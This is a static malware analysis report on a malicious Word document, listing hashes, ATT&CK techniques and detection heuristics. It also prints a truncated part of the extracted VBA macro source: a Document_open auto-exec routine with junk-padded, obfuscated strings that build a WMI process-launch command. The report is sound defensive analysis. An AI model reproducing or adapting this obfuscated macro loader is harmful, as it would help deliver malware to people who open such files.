Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d220bbc8081710b4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 192.5 KB
Created: 2020-08-19 17:17:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 20f7ac4a8d0b5958a8fbc7137c0049b9
SHA-1: a92cbd54f03edf7b9a604a7576176f5e845383fb
SHA-256: d220bbc8081710b4776297c19f586d5ea6353b14ae1b1dcc7819e1f969aead89
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open auto-execution macro and a hidden-property command stager, which indicates malicious intent. The ClamAV detection 'Doc.Malware.Sagent-9401419-0' corroborates this. The VBA code most likely attempts to download and execute a secondary payload, a common malware delivery technique.

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-9401419-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Sagent-9401419-0
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (severity: critical, rule: OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15428 bytes
SHA-256: 06ef3089ae1eacf6fbae8a5da9610b79b11a2cfb9f3c91e8e9a2c84577794915

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vg3ugxelvrlzed9hwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Sf4dqd6iw65q.T7wnceflceber74
End Sub


Attribute VB_Name = "Sf4dqd6iw65q"
Attribute VB_Base = "0{48C75266-7CEB-4D4E-BA70-7FA9510850F9}{9B9F1939-CA22-4B47-8377-DEB12F5C17DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function T7wnceflceber74()
   Nrpfn1tngfbnfmdn8w = "637"
If Len("Ynj91ucwnnyc7Uw59kn4au9elmu") = Len("Hk1e_luku1vkdf_tc") + 1 Then End
If Len("Xn2jpxiu85l4Ft5dd908filkizS7upcfphba6") < Len("Wpo1_2ko3kb") Then
        MsgBox "Pek3eq_g9f6bj72j3m" + "Ci6cr3smt9lmp5y59"
        MsgBox ("Rcwayf1umrd_bwps9")
        MsgBox "Tb4awdrjx5qiwb5o" + "Ggdv1m8pbiu"
End If
If Len("S897_d8cyqsups8ee6Exsfm6dbz7v") = Len("W9m99smx08mq4yu") Then
       MsgBox "Fq4khhnkh2wb" + "Bhgc8xxdv_x4hdjkbn"
       MsgBox ("I05jdlnyub1g8l37 !!!")
       MsgBox "Eo8b8cwrgs_edago" + "S9i0c3t0cb641rqhud"
End If

Ld83k56umwr = Sf4dqd6iw65q.HelpContextId + 50 + 50
   V0actu6res35x8e = "916"
If Len("Wxk4xuazhyhbqzzf8nYt742gucwgn327le") = Len("P69j9l77n5b") + 1 Then End
If Len("Ux8kfgq_6twcsoV8qfeuvtcprah_8Jtx4tqrvz6ekci") < Len("Tt5b_8z86id57zfia") Then
        MsgBox "Dju6v0op7qjqlr5u1r" + "Y9ryw4vqww8twe"
        MsgBox ("Y_k896xubiyp9")
        MsgBox "Zl0z6b_zv0cat450" + "Ql0t6j4tulopq9ny4w"
End If
If Len("Y63cmjpm69m61Hbd0dfbggl2") = Len("Geazm1gtac6jxkq") Then
       MsgBox "Yvhqymf8k11rj3zrl1" + "Hlgvwzhcig6l41divd"
       MsgBox ("Y90eoxazkjoo9 !!!")
       MsgBox "Hfw2aw3rk92qo83fte" + "A3cmh39w_8453"
End If

Zqe11tc7slxyfkwai = ChrW(Ld83k56umwr + (15))
   O2ajj2cssr2 = "752"
If Len("E9pqj11ry1fo75swgnS2otis1erwucp3m") = Len("Jonp3mlp6wxo") + 1 Then End
If Len("Grme0bh3oh0uvjCy2wuvfh402op0zw6Sifh0q2er0ho7") < Len("Bqlh7b65djtf") Then
        MsgBox "Q351veh8b28z" + "Wpeg_pcvm_xs2"
        MsgBox ("M6e7y4idnxjxkzka1")
        MsgBox "Nvgq19kedxl4gi" + "H1b86j8c3bs8nfoll"
End If
If Len("G_fybfhwuzv4vA4_0id7gwtooha") = Len("Z1m_t9izyz71jzhr0q") Then
       MsgBox "Xvfqchocowj" + "Yhzu_j4bt4dmjmow"
       MsgBox ("Kcp9gem5kk4f76 !!!")
       MsgBox "Kb0sufhhgos" + "M5g143w0u51"
End If

Elj6thrnpk_98q8ja0 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Zqe11tc7slxyfkwai + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sf4dqd6iw65q.Sbicpimbs57oa9_ + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Bbr2wpasobsn = "45"
If Len("Fq59zwdb56odgjcz0eAgeo2y85f_qe_tbdq") = Len("Jcereigdxpg95p8zn2") + 1 Then End
If Len("Bcj440bo2ouDw4wbztb8hyaQhgahkgkao4djl") < Len("C6qzckala57a51g") Then
        MsgBox "Kjmf27ntdo6ei_s3n" + "Yb3_9gx7fhm"
        MsgBox ("Jv5uo69g3hs9v")
        MsgBox "L8damdx52fdplft6" + "Eg5bkkywy6gi2u5o"
End If
If Len("T24f7jxt5zr0Uy9sm23yfwqpyjq") = Len("Avjbdo3cvk9gsqw") Then
       MsgBox "Qectkjicxvwe" + "Shag05di9qo77"
       MsgBox ("A5vgzaj4ug9l3ngpt4 !!!")
       MsgBox "S6d8_uxs0zzzyplh" + "Bo8ed9y5jxc2"
End If

I7o9scg_fx0u5u = W6bxcb63rbrdfpvds5(Elj6thrnpk_98q8ja0)
   Uz1uet561r3n = "909"
If Len("Bp6xg8w9nb85dw32e0Ub_p11e2svbn") = Len("K928ffpyshqx42b8c") + 1 Then End
If Len("
... (truncated)